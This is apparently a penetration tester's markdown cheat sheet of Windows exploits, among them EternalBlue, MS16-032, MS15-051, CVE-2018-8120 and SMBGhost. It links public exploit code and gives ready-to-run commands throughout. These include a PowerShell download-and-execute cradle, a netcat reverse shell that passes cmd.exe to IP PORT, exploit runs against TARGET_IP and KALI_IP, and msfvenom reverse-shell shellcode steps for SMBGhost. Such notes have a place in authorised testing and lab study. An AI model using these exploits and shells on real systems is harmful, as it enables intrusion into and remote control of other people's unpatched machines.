# windows exploits

## MS08-067 Exploit

* <https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py>
* <https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067_w2k3_sp2.py>

## MS-17-010 EternalBlue Exploit

* msf:
  * checker: `use auxiliary/scanner/smb/smb_ms17_010`
  * exploit: `use exploit/windows/smb/ms17_010_eternalblue`
* [eternalblue\_manual\_exploit](https://root4loot.com/post/eternalblue_manual_exploit/)
  * manual method; no named pipes required
* [helviojunior/MS17-010.git](https://github.com/helviojunior/MS17-010.git)
  * set the username to guest / anonymous if needed
  * `python send_and_execute.py TARGET_IP SHELL.exe`
* [3ndG4me/AutoBlue-MS17-010](https://github.com/3ndG4me/AutoBlue-MS17-010)
  * make sure the prerequisites have been run first
  * `python zzz_exploit.py TARGET_IP`
* [exploit-db/42315](https://www.exploit-db.com/exploits/42315)

## MS-16-032 Exploit

* [EmpireProject/Invoke-MS16032.ps1](https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-MS16032.ps1)
  * `Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('shell.ps1')"`

## Windows 7

* MS11-046 | CVE-2011-1249 | win7 6.1.7600 N/A Build 7600 x86
  * [abatchy17/MS11-046](https://github.com/abatchy17/WindowsExploits/tree/master/MS11-046)
* MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
  * [egre55/MS10-059:%20Chimichurri/Compiled](https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled)
  * `MS10-059.exe KALI_IP PORT`

## MS09-050 'srv2.sys' SMB Code Execution (Python)

* [exploit-db/40280](https://www.exploit-db.com/exploits/40280)

## MS09-002 Memory Corruption IE7 Exploit

* msf: `use windows/browser/ms09_002_memory_corruption`

## Windows Server 2008 R2 SP1

* CVE-2018-8120
  * Description: the Win32k component fails to properly handle objects in memory; allows arbitrary code execution in kernel mode (local privilege escalation)
  * [SecWiki/CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120)

## Windows 7 SP1

* CVE-2018-8120
  * Description: the Win32k component fails to properly handle objects in memory; allows arbitrary code execution in kernel mode (local privilege escalation)
  * [SecWiki/CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120)

## Windows Server 2008 SP1

* CVE-2018-8120
  * Description: the Win32k component fails to properly handle objects in memory; allows arbitrary code execution in kernel mode (local privilege escalation)
  * [SecWiki/CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120)
* MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
  * [egre55/MS10-059:%20Chimichurri/Compiled](https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled)
  * `MS10-059.exe KALI_IP PORT`

## Windows Server 2003

* MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
  * [egre55/MS10-059:%20Chimichurri/Compiled](https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled)
  * `MS10-059.exe KALI_IP PORT`

## Windows Server 2012 R2 Standard

* MS16-098 | CVE-2016-3309 | Server 2012 R2 Standard 6.3.9600 N/A Build 9600
  * [SecWiki/MS16-098](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098)

## Windows Server 2008 R2

* MS15-051
  * [SecWiki/MS15-051/MS15-051-KB3045171.zip](https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip)
  * `ms15-051.exe "nc64.exe -c cmd.exe IP PORT"`
* MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86
  * [egre55/MS10-059:%20Chimichurri/Compiled](https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled)
  * `MS10-059.exe KALI_IP PORT`

## Windows XP SP1

* Local privilege escalation via Windows services (upnphost and SSDPSRV)
  * <https://sohvaxus.github.io/content/winxp-sp1-privesc.html>

## CVE-2020-0796 | SMBGhost

**REQUIREMENTS:**

* SMB (port 445) must be open and reachable on the target

### Steps:

1. [danigargu/CVE-2020-0796](https://github.com/danigargu/CVE-2020-0796)
2. Generate shellcode using `msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f dll -f csharp`
3. Replace the shellcode on line 204 of `exploit.cpp`
4. Set TARGET\_ARCH and select the Release build configuration
5. Build the solution
6. Run `cve-2020-0796-local.exe`
